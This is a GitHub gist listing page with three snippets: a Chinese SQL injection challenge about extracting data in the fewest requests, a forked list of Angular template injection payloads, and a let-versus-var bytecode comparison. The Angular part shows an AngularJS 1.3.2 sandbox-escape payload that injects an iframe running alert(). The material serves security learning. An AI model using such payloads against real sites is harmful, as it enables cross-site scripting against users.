Skip to content

Instantly share code, notes, and snippets.

View aszx87410's full-sized avatar

Huli aszx87410

1.8k followers · 20 following
View GitHub Profile
@aszx87410
aszx87410 / sqlinjection.md
Last active January 11, 2022 13:45
SQL injection

SQL injection 小挑戰

說明

底下是兩個從實際案例修改而成的 SQL injection 小挑戰,很明顯有 SQL injection 的漏洞
要拿到 flag 不難,但我覺得有趣的是「要如何利用最少的 request,得到最多的資訊」
舉例來說,boolean based 一次只能拿到 true 或 false,資訊量就偏少
如果能直接 union 然後把結果 dump 出來,資訊量就大很多

因此這個挑戰的目的在於如何用最少的 request,得到最多的資訊量

@aszx87410
aszx87410 / AngularTI.md
Created August 18, 2021 07:43 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@aszx87410
aszx87410 / README.md
Last active December 8, 2023 21:59
let vs var by investigating the bytecode generated by Node.js

It's the reply to the question raised by @getify on his twitter:

here's a variation on the question... will JS engines exhibit much performance difference between these two loops?

for (var i = 0; i < 100000000; i++) {
   // do some stuff, but not closure
}

for (let i = 0; i < 100000000; i++) {